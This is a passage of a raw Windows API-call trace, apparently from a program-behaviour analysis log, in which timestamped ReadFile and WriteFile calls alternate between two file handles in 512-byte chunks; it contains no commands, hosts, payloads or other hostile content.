[0025.914] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.914] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.915] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.916] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.916] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.917] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.917] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.917] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.918] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.918] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.919] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.919] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.920] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.920] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.921] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.921] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.922] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.922] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.923] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.923] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.924] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.924] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.925] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.925] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.926] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.926] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.927] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.928] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.928] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.929] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.929] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.930] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.931] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.931] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.932] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.932] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.933] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.933] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.934] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.934] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.935] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.936] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.936] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.937] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.937] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.938] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.939] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.940] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.940] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.941] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.941] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.942] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.942] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.942] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.943] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.943] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.944] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.944] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.945] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.945] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.946] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.946] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.947] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.947] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.948] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.948] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.949] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.949] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.950] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.950] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.951] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.951] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.952] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.952] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.953] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.953] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.954] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.954] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.955] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.955] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.956] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.956] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.957] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.958] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.958] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.959] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.959] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.960] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.960] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.960] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.961] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.961] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.962] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.962] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: 